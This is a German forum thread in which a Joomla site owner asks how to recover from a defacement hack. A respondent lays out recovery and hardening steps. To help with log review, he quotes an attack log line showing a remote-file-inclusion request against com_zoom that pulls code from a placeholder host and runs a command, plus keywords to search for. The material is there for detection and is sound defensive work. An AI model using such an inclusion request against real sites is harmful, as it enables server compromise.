Thema: (verschoben) Joomla Hack, was nun..

Hi hallo, heute wurde meine Joomla Website gehackt. Erst kam eine Laufschrift: Hack by..., und dann nur noch eine weiße Seite. Alle Dateien sind aber noch auf dem Server...kann man da etwas retten ?? und wie funzt so ein Hack überhaupt???
Brauche dringent HILFE

Danke

pnuernbe

Zitat von pnuernbe

Hi hallo, heute wurde meine Joomla Website gehackt. Erst kam eine Laufschrift: Hack by..., und dann nur noch eine weiße Seite. Alle Dateien sind aber noch auf dem Server...kann man da etwas retten ?? und wie funzt so ein Hack überhaupt???
Brauche dringent HILFE

Danke

pnuernbe

Die Frage wird täglich gestellt:

http://www.joomlaportal.de/search.php?searchid=2636369

Gedanken lesen kann keiner. Mit ein paar mehr Infos musst Du schon rausrücken.
zudem wird dieses Thema täglich behandelt. Aber nochmal ganz speziell und nur für Dich :

Artikel zum Thema , allgemeine Hinweise zur Sicherheit, Liste mit unsicheren Komponenten, alternative auf deutsch.

- Die Daten lassen sich retten. Dafür gibt es Backups.
- Du hast kein Backup? Das ist schlecht.
- Du sicherst alle Dateien Deines Servers* (inkl. der Datenbank u. Logfiles) lokal.
- Dann löschst Du alles auf Deinem Server um weiteren Schaden zu verhindern.

Nun suchst Du nach der Schwachstelle.
Übliche Lücken sind veraltete Versionen (joomla, komponenten).
Da gibt es Listen mit als unsicher bekannten Komponenten. (s.o.)

Hast Du eine Installiert? Wenn ja updaten oder ersetzten.
Zudem logfiles durchsuchen. Da wird man i.R. schnell fündig.
(=http, mosconfig_, curl, wget, usw. usf.)

Verdächtig sind z.B. solche einträge:

xx.xxx.xxx.xxx - - [19/Apr/2007:05:06:23 +0200] "GET /components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://domain.tdl/isko.dat?&list=1&cmd=id HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

Nun überprüfst Du die Servereinstellungen (was empfohlen ist steht auch hier im Forum) - insbesondere die Einstellungen der php.ini. Diese passt Du an oder lässt das machen. Wenn das nicht geht hoster wechseln.

Dann frisches joomla installieren mit aktuellen Komponenten (oder ein sauberes Backup lokal updaten und dann hochladen) . Zum schluss ein sauberes backup der Datenbank einspielen. Fertig.
Falls Du kein Backup hast - musst Du alle Dateien "von Hand" überprüfen die nicht mit einer frischen Installation von joomla übereinstimmen. Besonders das absuchen der Datenbank nach "bösen" Einträgen (zusätzliche User/ Administratoren usw) stelle ich mir als mühsame Aufgabe vor... Viel Spass dabei.

*-> mit Server meine ich natürlich den angemieteten Webspace ("Webhosting paket").

Zitat von cybergurk

Moin, das bringt nun auch nix, habt Ihr noch nicht gemerkt, das die Suche personalisiert wird? und hinten die id des User angehangen wird? Klickt einer darauf wird/kann nix gefunden werden..

Vielen Dank für den Hinweis!